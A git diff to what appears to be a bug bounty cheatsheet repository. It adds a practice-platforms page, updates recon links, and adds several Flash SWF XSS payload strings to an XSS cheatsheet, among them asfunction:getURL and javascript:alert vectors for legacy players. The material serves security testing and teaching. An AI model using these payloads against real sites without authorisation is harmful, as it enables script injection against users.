diff --git a/README.md b/README.md index 921f75d..ee987dd 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,7 @@ - [Books](cheatsheets/books.md) - [Special Tools](cheatsheets/special-tools.md) - [Recon](cheatsheets/recon.md) +- [Practice Platforms](cheatsheets/practice-platforms.md) - [XSS](cheatsheets/xss.md) - [SQLI](cheatsheets/sqli.md) - [SSRF](cheatsheets/ssrf.md) @@ -53,3 +54,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae) +- [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors) diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md new file mode 100644 index 0000000..fdd8259 --- /dev/null +++ b/cheatsheets/practice-platforms.md @@ -0,0 +1,9 @@ +## Practice Platforms + +- [Pentesterlab](https://pentesterlab.com/) +- [XSS Game](https://xss-game.appspot.com/) +- [Hack This Site](https://www.hackthissite.org) +- [Root-Me](https://www.root-me.org) +- [HackTheBox](https://www.hackthebox.eu) +- [Hack Me](https://hack.me) +- [CTF 365](https://ctf365.com) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index 9133c1c..3af076f 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -38,8 +38,8 @@ otherapp.10.0.0.1.nip.io - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) -- [Wayback Machine](https://archive.org/web/) (Find Intresting stuff hosted on the Domain in past) -- http://ipv4info.com (Find all domains inside an IP block owned by the Company/Organization) +- [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks) + **Report Templates** diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 9fd8b26..26f0eae 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -120,7 +120,7 @@ javas cript://www.google.com/%0Aalert(1) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` -- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` +- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` @@ -128,6 +128,10 @@ javas cript://www.google.com/%0Aalert(1) - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` +- AutoDemo: `control.swf?onend=javascript:alert(1)//` + +- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//` + - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` @@ -136,7 +140,7 @@ javas cript://www.google.com/%0Aalert(1) - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` -_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ +_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ **Lightweight Markup Languages**